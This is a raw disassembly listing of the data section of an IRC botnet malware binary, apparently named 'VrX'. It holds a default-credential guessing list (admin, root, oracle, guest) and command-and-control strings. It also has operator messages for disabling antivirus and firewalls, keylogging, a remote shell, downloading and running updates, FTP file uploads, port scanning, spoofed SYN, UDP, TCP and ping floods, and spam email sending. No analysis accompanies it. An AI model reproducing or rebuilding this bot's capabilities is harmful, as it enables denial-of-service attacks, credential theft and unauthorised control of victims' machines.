aDb2 db 'db2',0 ; DATA XREF: .data:00429460�o
aOracle db 'oracle',0 ; DATA XREF: .data:00429478�o
align 4
aDba db 'dba',0
aDatabase db 'database',0 ; DATA XREF: .data:00429440�o
align 4
aDefault db 'default',0 ; DATA XREF: .data:00429330�o
aGuest_0 db 'guest',0 ; DATA XREF: .data:00429318�o
align 4
aWwwadmin db 'wwwadmin',0
align 4
aTeacher db 'teacher',0 ; DATA XREF: .data:004294C0�o
aStudent db 'student',0 ; DATA XREF: .data:004294BC�o
aOwner db 'owner',0
align 10h
aComputer db 'computer',0
align 4
aRoot db 'root',0 ; DATA XREF: .data:0042933C�o
align 4
aStaff db 'staff',0 ; DATA XREF: .data:004294C4�o
align 4
aAdmin db 'admin',0 ; DATA XREF: .data:004292B4�o
align 4
aAdmins db 'admins',0 ; DATA XREF: .data:004292B0�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: .data:004292AC�o
aAdministrateur db 'administrateur',0 ; DATA XREF: .data:004292A8�o
align 4
aAdministrador db 'administrador',0 ; DATA XREF: .data:004292A4�o
align 4
aAdministrato_0 db 'administrator',0 ; DATA XREF: .data:004292A0�o
align 4
aMircV6_21Khale db 'mIRC v6.21 Khaled Mardam-Bey',0 ; DATA XREF: .data:0042916C�o
align 4
aMircV6_20Khale db 'mIRC v6.20 Khaled Mardam-Bey',0 ; DATA XREF: .data:00429168�o
align 4
aMircV6_17Khale db 'mIRC v6.17 Khaled Mardam-Bey',0 ; DATA XREF: .data:00429164�o
align 4
aMircV6_16Khale db 'mIRC v6.16 Khaled Mardam-Bey',0 ; DATA XREF: .data:off_429160�o
align 4
a@admin_com db '*@admin.com',0 ; DATA XREF: .data:off_42915C�o
dword_4299D4 dd 234032Dh, 6E656469h, 2036474h ; DATA XREF: sub_401221+46B�o
aFailedToStartS db '- Failed to start server, error: <%d>.',0
align 4
dword_429A08 dd 234032Dh, 6E656469h, 2036474h ; DATA XREF: sub_401221+420�o
aServerRunningO db '- Server running on Port: 113.',0
align 4
unk_429A34 db 2Dh ; - ; DATA XREF: sub_401221+3F3�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 3, 2, 2Dh
aFailedToStartA db ' Failed to start AV/FW killer thread, error: <%d>.',0
align 4
unk_429A74 db 2Dh ; - ; DATA XREF: sub_401221+3A2�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 3, 2, 2Dh
aAvFwKillerActi db ' AV/FW Killer active.',0
align 4
dword_429A98 dd 234032Dh, 6E69616Dh, 202D0203h, 20746F42h, 72617473h
; DATA XREF: sub_401221+364�o
dd 2E646574h, 0
aSDS db '%s %d "%s"',0 ; DATA XREF: sub_401221+28F�o
align 10h
aSS_0 db '%s\%s',0 ; DATA XREF: sub_401221+189�o
; sub_41716F+45�o
align 4
aSS db '%s%s',0 ; DATA XREF: sub_401221+10D�o
; sub_4100B4+EA�o ...
align 10h
unk_429AD0 db 3 ; DATA XREF: sub_4017ED+F2�o
a81VrxConnected db '8,1-VrX- Connected to %s.',0
align 4
aNickSUserS00S db 'NICK %s',0Dh,0Ah ; DATA XREF: sub_401955+62�o
db 'USER %s 0 0 :%s',0Dh,0Ah,0
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_401955+35�o
align 4
aModeSS_0 db 'MODE %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+7D25�o
align 4
aUserhostS db 'USERHOST %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+7D0D�o
align 4
unk_429B34 db 3 ; DATA XREF: sub_401ACD+7CF9�o
a81VrxUserSLogg db '8,1-VrX- User: %s logged in.',0
align 4
unk_429B54 db 3 ; DATA XREF: sub_401ACD+7CDC�o
a81VrxPasswordA db '8,1-VrX- Password accepted.',0
align 4
unk_429B74 db 3 ; DATA XREF: sub_401ACD+7C7B�o
a81VrxFailedHos db '8,1-VrX- *Failed host auth by: (%s!%s).',0
align 10h
aNoticeSHostAut db 'NOTICE %s :Host Auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_401ACD+7C52�o
align 4
unk_429BC8 db 3 ; DATA XREF: sub_401ACD+7C14�o
a81VrxFailedPas db '8,1-VrX- *Failed pass auth by: (%s!%s).',0
align 4
aNoticeSYourAtt db 'NOTICE %s :Your attempt has been logged.',0Dh,0Ah,0
; DATA XREF: sub_401ACD+7C02�o
; sub_401ACD+7C69�o
align 10h
aNoticeSPassAut db 'NOTICE %s :Pass auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_401ACD+7BEB�o
align 4
asc_429C48: ; DATA XREF: sub_401ACD+7BBB�o
unicode 0, <~>,0
unk_429C4C db 3 ; DATA XREF: sub_401ACD+7B6B�o
a81VrxRandomNic db '8,1-VrX- Random nick change: %s',0
align 10h
unk_429C70 db 3 ; DATA XREF: sub_401ACD+7AFD�o
a81VrxReconnect db '8,1-VrX- Reconnecting in %s seconds',0
align 4
unk_429C98 db 3 ; DATA XREF: sub_401ACD+7AB9�o
a81VrxReconne_0 db '8,1-VrX- Reconnecting in %s ms',0
unk_429CB8 db 3 ; DATA XREF: sub_401ACD+7A99�o
a81VrxNickChang db '8,1-VrX- Nick changed to: ',27h,'%s',27h,'.',0
align 4
unk_429CDC db 3 ; DATA XREF: sub_401ACD+7A7D�o
a81VrxJoinedCha db '8,1-VrX- Joined channel: ',27h,'%s',27h,'.',0
unk_429CFC db 3 ; DATA XREF: sub_401ACD+7A5A�o
a81VrxPartedCha db '8,1-VrX- Parted channel: ',27h,'%s',27h,'.',0
unk_429D1C db 3 ; DATA XREF: sub_401ACD+7A3E�o
a81VrxIrcRawS_ db '8,1-VrX- IRC Raw: %s.',0
align 4
unk_429D34 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_40948A�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aFailedToKillTh db '- Failed to kill thread: %s.',0
align 10h
unk_429D60 db 2Dh ; - ; DATA XREF: sub_401ACD+79B6�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aKilledThreadS_ db '- Killed thread: %s.',0
align 4
unk_429D84 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_40943D�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aNoActiveThread db '- No active threads found.',0
unk_429DAC db 2Dh ; - ; DATA XREF: sub_401ACD+7966�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aStoppedDThread db '- Stopped: %d thread(s).',0
align 4
aAll db 'all',0 ; DATA XREF: sub_401ACD+794C�o
unk_429DD8 db 3 ; DATA XREF: sub_401ACD+7848�o
a81VrxPrefixCha db '8,1-VrX- Prefix changed to: ',27h,'%c',27h,'.',0
align 4
unk_429DFC db 2Dh ; - ; DATA XREF: sub_401ACD:loc_409300�o
db 3, 34h, 2
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aCouldnTOpenFil db ' Couldn',27h,'t open file: %s',0
unk_429E20 db 2Dh ; - ; DATA XREF: sub_401ACD+7829�o
db 3, 34h, 2
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aFileOpenedS db ' File opened: %s',0
align 10h
unk_429E40 db 3 ; DATA XREF: sub_401ACD+7809�o
a81VrxServerCha db '8,1-VrX- Server changed to: ',27h,'%s',27h,'.',0
align 4
unk_429E64 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_4092BD�o
db 3, 34h, 2
db 64h ; d
db 6Eh, 73h, 2
db 3
aCouldnTResol_0 db '- Couldn',27h,'t resolve hostname.',0
align 4
unk_429E8C db 2Dh ; - ; DATA XREF: sub_401ACD+77C2�o
db 3, 34h, 2
db 64h ; d
db 6Eh, 73h, 2
db 3
aLookupSS_ db '- Lookup: %s -> %s.',0
align 4
unk_429EAC db 2Dh ; - ; DATA XREF: sub_401ACD:loc_409255�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aFailedToTermin db ' Failed to terminate process: %s',0
align 4
unk_429EDC db 2Dh ; - ; DATA XREF: sub_401ACD+777E�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessKilledS db ' Process killed: %s',0
unk_429EFC db 2Dh ; - ; DATA XREF: sub_401ACD:loc_4091F5�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aFailedToTerm_0 db ' Failed to terminate process ID: %s',0
unk_429F2C db 2Dh ; - ; DATA XREF: sub_401ACD+7721�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessKilledI db ' Process killed ID: %s',0
align 10h
dword_429F50 dd 234032Dh, 656C6966h, 202D0302h, 656C6544h, 20646574h
; DATA XREF: sub_401ACD+76DF�o
dd 27732527h, 2Eh
unk_429F6C db 2Dh ; - ; DATA XREF: sub_401ACD+7667�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aSendFileSUserS db '- Send File: %s, User: %s.',0
dword_429F90 dd 234032Dh, 656C6966h, 202D0302h, 7473694Ch, 7325203Ah
; DATA XREF: sub_401ACD+75EC�o
dd 0
unk_429FA8 db 2Dh ; - ; DATA XREF: sub_401ACD+75BF�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aFailedToStartC db ' Failed to start connection thread, error: <%d>.',0
align 4
dword_429FE8 dd 234032Dh, 69736976h, 2D030274h, 4C525520h, 7325203Ah
; DATA XREF: sub_401ACD+7550�o
dd 2Eh
dword_42A000 dd 234032Dh, 6372696Dh, 202D0302h, 6D6D6F43h, 20646E61h
; DATA XREF: sub_401ACD:loc_408F9D�o
dd 746E6573h, 2Eh
unk_42A01C db 2Dh ; - ; DATA XREF: sub_401ACD+74C9�o
db 3, 34h, 2
db 6Dh ; m
db 69h, 72h, 63h
db 2
db 3, 2Dh, 20h
aClientNotOpen_ db 'Client not open.',0
align 4
dword_42A03C dd 234032Dh, 2646D63h, 43202D03h, 616D6D6Fh, 3A73646Eh
; DATA XREF: sub_401ACD+748F�o
dd 732520h
unk_42A054 db 2Dh ; - ; DATA XREF: sub_401ACD+7481�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aErrorSendingTo db '- Error sending to remote shell.',0
align 10h
asc_42A080: ; DATA XREF: sub_401ACD+7469�o
; sub_4100B4+FB�o ...
dw 0Ah
unicode 0, <>,0
unk_42A084 db 3 ; DATA XREF: sub_401ACD+7441�o
a81VrxReadFileF db '8,1-VrX- Read file failed: %s',0
align 4
unk_42A0A4 db 3 ; DATA XREF: sub_401ACD+7436�o
a81VrxReadFileC db '8,1-VrX- Read file complete: %s',0
align 4
aUnknowModeType db 'Unknow mode type.',0 ; DATA XREF: sub_401ACD:loc_408E97�o
align 4
aFailedToStartL db 'Failed to start logging thread, error: <%d>.',0
; DATA XREF: sub_401ACD+73B4�o
align 4
aNormalKeyLogge db 'Normal key logger active.',0 ; DATA XREF: sub_401ACD+733D�o
align 4
aNormal_0 db 'normal',0 ; DATA XREF: sub_401ACD+72ED�o
align 10h
aKeylogerAlread db 'Keyloger Already running.',0 ; DATA XREF: sub_401ACD+7263�o
align 4
aVrxV3_0SitesKe db 'VrX v3.0 sites keylogger active.',0 ; DATA XREF: sub_401ACD+7236�o
; sub_401ACD+72E5�o
align 10h
aKeylog_0 db 'Keylog',0 ; DATA XREF: sub_401ACD+7231�o
align 4
unk_42A178 db 3 ; DATA XREF: sub_401ACD+7216�o
a81VrxGethostS_ db '8,1-VrX- Gethost: %s.',0
align 10h
unk_42A190 db 3 ; DATA XREF: sub_401ACD+71D2�o
a81VrxUnableToE db '8,1-VrX- Unable to extract Gethost command.',0
align 10h
unk_42A1C0 db 3 ; DATA XREF: sub_401ACD+71B6�o
a81VrxGethostSC db '8,1-VrX- Gethost: %s, Command: %s',0
align 4
unk_42A1E4 db 3 ; DATA XREF: sub_401ACD+7119�o
a81VrxAliasAdde db '8,1-VrX- Alias added: %s.',0
align 10h
unk_42A200 db 3 ; DATA XREF: sub_401ACD+70E7�o
a81VrxPrivmsgSS db '8,1-VrX- Privmsg: %s: %s.',0
align 4
unk_42A21C db 3 ; DATA XREF: sub_401ACD+7096�o
a81VrxActionSS_ db '8,1-VrX- Action: %s: %s.',0
align 4
dword_42A238 dd 312C3803h, 5872562Dh, 7943202Dh, 2E656C63h, 0
; DATA XREF: sub_401ACD+7028�o
aPartS_1 db 'PART %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+6FEE�o
; sub_401ACD+7A49�o
align 4
unk_42A258 db 3 ; DATA XREF: sub_401ACD+6FC7�o
a81VrxModeChang db '8,1-VrX- Mode change: %s',0
align 4
aModeS_0 db 'MODE %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+6FB6�o
align 10h
dword_42A280 dd 234032Dh, 6E6F6C63h, 2D030265h, 77615220h, 73252820h
; DATA XREF: sub_401ACD+6F8D�o
dd 25203A29h, 73h
dword_42A29C dd 234032Dh, 6E6F6C63h, 2D030265h, 646F4D20h, 25282065h
; DATA XREF: sub_401ACD+6F1F�o
dd 203A2973h, 7325h
aModeS db 'MODE %s',0 ; DATA XREF: sub_401ACD+6EC7�o
dword_42A2C0 dd 234032Dh, 6E6F6C63h, 2D030265h, 63694E20h, 2528206Bh
; DATA XREF: sub_401ACD+6E95�o
dd 203A2973h, 7325h
aJoinSS_0 db 'JOIN %s %s',0 ; DATA XREF: sub_401ACD+6E1D�o
align 4
aS db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+6DEB�o
; sub_401ACD+6E71�o ...
align 10h
aPartS_0 db 'PART %s',0 ; DATA XREF: sub_401ACD+6DB6�o
dword_42A2F8 dd 234032Dh, 67726174h, 3023361h ; DATA XREF: sub_401ACD+6D79�o
aFailedToStartF db '- Failed to start flood thread, error: <%d>.',0
align 4
dword_42A334 dd 234032Dh, 67726174h, 3023361h ; DATA XREF: sub_401ACD+6D0E�o
aFloodingSForSS db '- Flooding %s for %s seconds.',0
align 10h
unk_42A360 db 2Dh ; - ; DATA XREF: sub_401ACD+6CA8�o
db 3, 34h, 2
db 74h ; t
db 73h, 75h, 6Eh
db 61h ; a
db 6Dh, 69h, 2
db 3
aFailedToStar_0 db '- Failed to start flood thread, error: <%d>.',0
align 4
unk_42A39C db 2Dh ; - ; DATA XREF: sub_401ACD+6C39�o
db 3, 34h, 2
db 74h ; t
db 73h, 75h, 6Eh
db 61h ; a
db 6Dh, 69h, 2
db 3
aTsunamiHeading db '- Tsunami heading for %s (%s seconds).',0
unk_42A3D0 db 3 ; DATA XREF: sub_401ACD+6B9D�o
a81VrxRepeatNot db '8,1-VrX- Repeat not allowed in command line: %s',0
align 4
unk_42A404 db 3 ; DATA XREF: sub_401ACD+6B60�o
a81VrxRepeatS db '8,1-VrX- Repeat: %s',0
align 4
dword_42A41C dd 312C3803h, 5872562Dh, 6544202Dh, 2E79616Ch, 0
; DATA XREF: sub_401ACD:loc_408591�o
aSSSS db '%s %s %s :%s',0 ; DATA XREF: sub_401ACD+6A84�o
; sub_401ACD+6B37�o ...
align 10h
dword_42A440 dd 234032Dh, 61647075h, 3026574h ; DATA XREF: sub_401ACD:loc_4084F0�o
aBotIdMustBeDif db '- Bot ID must be different than current running process.',0
align 4
dword_42A488 dd 234032Dh, 61647075h, 3026574h ; DATA XREF: sub_401ACD+6A19�o
aFailedToStartD db '- Failed to start download thread, error: <%d>.',0
dword_42A4C4 dd 234032Dh, 61526159h, 3022162h ; DATA XREF: sub_401ACD+69AA�o
aDownloadingUpd db '- Downloading update from: %s.',0
align 10h
aSS_exe db '%s%s.exe',0 ; DATA XREF: sub_401ACD+6904�o
align 4
dword_42A4FC dd 234032Dh, 63657865h, 202D0302h, 6D6D6F43h, 73646E61h
; DATA XREF: sub_401ACD+68A2�o
dd 7325203Ah, 0
unk_42A518 db 2Dh ; - ; DATA XREF: sub_401ACD+6897�o
db 3, 34h, 2
db 65h ; e
db 78h, 65h, 63h
db 2
db 3, 2Dh, 20h
aCouldnTExecute db 'Couldn',27h,'t execute file.',0
align 4
unk_42A53C db 2Dh ; - ; DATA XREF: sub_401ACD+67FD�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aFailedToStar_1 db 'Failed to start search thread, error: <%d>.',0
unk_42A578 db 2Dh ; - ; DATA XREF: sub_401ACD+6787�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aSearchingForFi db 'Searching for file: %s in: %s.',0
align 4
dword_42A5A8 dd 234032Dh, 656C6966h, 2D0302h ; DATA XREF: sub_401ACD:loc_40818D�o
; sub_401ACD:loc_4091C7�o
unk_42A5B4 db 2Dh ; - ; DATA XREF: sub_401ACD+66AB�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aRenameSToS_ db 'Rename: ',27h,'%s',27h,' to: ',27h,'%s',27h,'.',0
align 4
unk_42A5D8 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_408156�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aInvalidFloodTi db 'Invalid flood time must be greater than 0.',0
align 10h
unk_42A610 db 2Dh ; - ; DATA XREF: sub_401ACD+667F�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aFailedToStar_2 db 'Failed to start flood thread, error: <%d>.',0
align 4
unk_42A648 db 2Dh ; - ; DATA XREF: sub_401ACD+660F�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aFloodingSFor_0 db 'Flooding: (%s) for %s seconds.',0
align 4
dword_42A674 dd 234032Dh, 6E6F6C63h, 3027365h ; DATA XREF: sub_401ACD+658C�o
aFailedToStar_3 db '- Failed to start clone thread, error: <%d>.',0
align 10h
dword_42A6B0 dd 234032Dh, 6E6F6C63h, 3027365h ; DATA XREF: sub_401ACD+651D�o
aCreatedOnSDInC db '- Created on %s:%d, in channel %s.',0
align 10h
unk_42A6E0 db 2Dh ; - ; DATA XREF: sub_401ACD+64A4�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aFailedToStar_4 db 'Failed to start flood thread, error: <%d>.',0
align 4
unk_42A718 db 2Dh ; - ; DATA XREF: sub_401ACD+6435�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aFloodingSSForS db 'Flooding: (%s:%s) for %s seconds.',0
align 4
unk_42A748 db 2Dh ; - ; DATA XREF: sub_401ACD+63AB�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aFailedToStar_5 db '- Failed to start flood thread, error: <%d>.',0
align 10h
unk_42A780 db 2Dh ; - ; DATA XREF: sub_401ACD+633C�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aFloodingSSFo_0 db '- Flooding: (%s:%s) for %s seconds.',0
align 10h
unk_42A7B0 db 2Dh ; - ; DATA XREF: sub_401ACD+62C3�o
db 3, 34h, 2
db 77h ; w
db 6Fh, 6Eh, 6Bh
db 2
db 3, 2Dh, 20h
aFailedToStar_6 db 'Failed to start flood thread, error: <%d>.',0
align 4
unk_42A7E8 db 2Dh ; - ; DATA XREF: sub_401ACD+6254�o
db 3, 34h, 2
db 77h ; w
db 6Fh, 6Eh, 6Bh
db 2
db 3, 2Dh, 20h
aFloodingSFor_1 db 'Flooding %s for %s seconds using delay %s ms.',0
align 4
unk_42A824 db 2Dh ; - ; DATA XREF: sub_401ACD+61DB�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aFailedToStartT db 'Failed to start transfer thread, error: <%d>.',0
align 4
dword_42A864 dd 234032Dh, 61526159h, 3022162h ; DATA XREF: sub_401ACD+616C�o
aDownloadingUrl db '- Downloading URL: %s to: %s.',0
align 10h
unk_42A890 db 2Dh ; - ; DATA XREF: sub_401ACD+609D�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aFailedToStartR db 'Failed to start redirection thread, error: <%d>.',0
align 4
unk_42A8D4 db 2Dh ; - ; DATA XREF: sub_401ACD+602E�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aTcpRedirectCre db 'TCP redirect created from: %s:%d to: %s:%d.',0
unk_42A910 db 3 ; DATA XREF: sub_401ACD+5F31�o
a81Sc@nPortScan db '8,1-SC@N- Port scan started: %s:%d with delay: %d(ms).',0
aSSS_0 db '[%s] <%s> %s',0 ; DATA XREF: sub_401ACD+5E85�o
align 4
aSSS db '[%s] * %s %s',0 ; DATA XREF: sub_401ACD+5DB0�o
align 4
dword_42A968 dd 54434101h, 204E4F49h, 17325h ; DATA XREF: sub_401ACD+5D22�o
; sub_401ACD+7074�o
unk_42A974 db 2Dh ; - ; DATA XREF: sub_401ACD+5CC0�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToStar_7 db 'Failed to start scan thread, error: <%d>.',0
align 10h
unk_42A9B0 db 2Dh ; - ; DATA XREF: sub_401ACD+5C51�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aPortScanStarte db 'Port scan started: %s with delay: %d(ms) checking range %d-%d.',0
align 10h
unk_42AA00 db 3 ; DATA XREF: sub_401ACD+5BBA�o
; sub_401ACD+5FA0�o
a81Sc@nFailedTo db '8,1-SC@N- Failed to start scan thread, error: <%d>.',0
align 4
unk_42AA38 db 3 ; DATA XREF: sub_401ACD+5B4B�o
a81Sc@nSPortSca db '8,1-SC@N- %s Port Scan started on %s:%d with a delay of %d second'
db 's for %d minutes using %d threads.',0
align 10h
unk_42AAA0 db 3 ; DATA XREF: sub_401ACD+59D5�o
a81Sc@nFailed_0 db '8,1-SC@N- Failed to start scan, no IP specified.',0
align 4
unk_42AAD4 db 3 ; DATA XREF: sub_401ACD+5978�o
a81Sc@nFailed_1 db '8,1-SC@N- Failed to start scan, port is invalid.',0
align 4
unk_42AB08 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_407320�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 2
db 3
aUploadingFileS db '- Uploading file: %s to: %s failed.',0
align 4
unk_42AB38 db 2Dh ; - ; DATA XREF: sub_401ACD+584C�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 2
db 3
aUploadingFil_0 db '- Uploading file: %s to: %s',0
align 10h
aFtp_exe db 'ftp.exe',0 ; DATA XREF: sub_401ACD+5835�o
aSS_2 db '-s:%s',0 ; DATA XREF: sub_401ACD+581E�o
align 10h
aOpenSSSSPutSBy db 'open %s',0Dh,0Ah ; DATA XREF: sub_401ACD+57FB�o
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'put %s',0Dh,0Ah
db 'bye',0Dh,0Ah,0
align 4
aAb db 'ab',0 ; DATA XREF: sub_401ACD+57D7�o
align 4
aSIII_dll db '%s\%i%i%i.dll',0 ; DATA XREF: sub_401ACD+57C6�o
align 4
unk_42ABA8 db 2Dh ; - ; DATA XREF: sub_401ACD+576D�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 2
db 3
aFileNotFoundS_ db '- File not found: %s.',0
align 4
aUpload db 'upload',0 ; DATA XREF: sub_401ACD+574A�o
align 10h
unk_42ABD0 db 3 ; DATA XREF: sub_401ACD+5714�o
a81Sc@nAlreadyD db '8,1-SC@N- Already %d scanning threads. Too many specified.',0
unk_42AC0C db 2Dh ; - ; DATA XREF: sub_401ACD+56B5�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aFailedToStar_8 db '- Failed to start flood thread, error: <%d>.',0
align 4
unk_42AC44 db 2Dh ; - ; DATA XREF: sub_401ACD+564A�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aSendingDPacket db '- Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).',0
align 4
unk_42AC8C db 2Dh ; - ; DATA XREF: sub_401ACD+5599�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aMessageHasBeen db '- Message has been sent successfuly',0
align 10h
unk_42ACC0 db 2Dh ; - ; DATA XREF: sub_401ACD+5565�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aFailedToSendMe db '- Failed to send message, error <%i>.',0
align 4
unk_42ACF4 db 2Dh ; - ; DATA XREF: sub_401ACD+5541�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aNetsendDoesNot db '- NetSend does not work on Win9x systems',0
align 4
unk_42AD2C db 2Dh ; - ; DATA XREF: sub_401ACD+549F�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aSendingMessage db '- Sending message %s times to %s using name %s',0
aIcmp_dllNotAva db 'ICMP.dll not available',0 ; DATA XREF: sub_401ACD+5482�o
align 10h
unk_42AD80 db 2Dh ; - ; DATA XREF: sub_401ACD+546D�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aFailedToStar_9 db 'Failed to start flood thread, error: <%d>.',0
align 4
unk_42ADB8 db 2Dh ; - ; DATA XREF: sub_401ACD+53FE�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aSendingDPingsT db 'Sending %d pings to %s. packet size: %d, timeout: %d(ms).',0
align 10h
unk_42AE00 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_406E1D�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aInvalidFlood_0 db '- Invalid flood time must be greater than 0.',0
align 4
unk_42AE38 db 2Dh ; - ; DATA XREF: sub_401ACD+5346�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aFailedToSta_10 db '- Failed to start flood thread, error: <%d>.',0
align 10h
unk_42AE70 db 2Dh ; - ; DATA XREF: sub_401ACD+52CC�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aSSFloodingSSFo db '- %s %s flooding: (%s:%s) for %s seconds.',0
align 4
aNormal db 'Normal',0 ; DATA XREF: sub_401ACD+52BC�o
align 4
aSpoofed db 'Spoofed',0 ; DATA XREF: sub_401ACD+52B5�o
unk_42AEB4 db 2Dh ; - ; DATA XREF: sub_401ACD+521A�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aInvalidFloodTy db '- Invalid flood type specified.',0
align 10h
aRandom_0 db 'random',0 ; DATA XREF: sub_401ACD+520A�o
; sub_4149C1+312�o
align 4
aAck db 'ack',0 ; DATA XREF: sub_401ACD+51F3�o
; sub_4149C1+2F2�o
aHcon db 'hcon',0 ; DATA XREF: sub_401ACD+517F�o
align 4
aHttpcon db 'httpcon',0 ; DATA XREF: sub_401ACD+516C�o
unk_42AEFC db 2Dh ; - ; DATA XREF: sub_401ACD+511D�o
db 3, 34h, 2
db 65h ; e
db 6Dh, 61h, 69h
db 6Ch ; l
db 2, 3, 2Dh
aMessageSentToS db ' Message sent to %s.',0
align 10h
aHeloRndnickMai db 'helo $rndnick',0Ah ; DATA XREF: sub_401ACD+50A9�o
db 'mail from: <%s>',0Ah
db 'rcpt to: <%s>',0Ah
db 'data',0Ah
db 'subject: %s',0Ah
db 'from: %s',0Ah
db '%s',0Ah
db '.',0Ah,0
aEmail db 'email',0 ; DATA XREF: sub_401ACD+4FBE�o
align 4
aTcp db 'tcp',0 ; DATA XREF: sub_401ACD+4FA7�o
aTcpflood db 'tcpflood',0 ; DATA XREF: sub_401ACD+4F90�o
align 4
aVncHttpHostCha db 'VNC: HTTP Host Changed To: %s',0 ; DATA XREF: sub_401ACD+4F66�o
align 4
aVnchost db 'vnchost',0 ; DATA XREF: sub_401ACD+4F48�o
aP: ; DATA XREF: sub_401ACD+4F31�o
; .data:00438788�o ...
unicode 0, <p>,0
aPing_0 db 'ping',0 ; DATA XREF: sub_401ACD+4F1A�o
align 4
aPingflood db 'pingflood',0 ; DATA XREF: sub_401ACD+4F03�o
align 4
aNs db 'ns',0 ; DATA XREF: sub_401ACD+4EEC�o
align 4
aNetsend db 'netsend',0 ; DATA XREF: sub_401ACD+4ED5�o
aU: ; DATA XREF: sub_401ACD+4EBE�o
; .data:00438780�o ...
unicode 0, <u>,0
aUdp db 'udp',0 ; DATA XREF: sub_401ACD+4EA7�o
aUdpflood db 'udpflood',0 ; DATA XREF: sub_401ACD+4E90�o
align 4
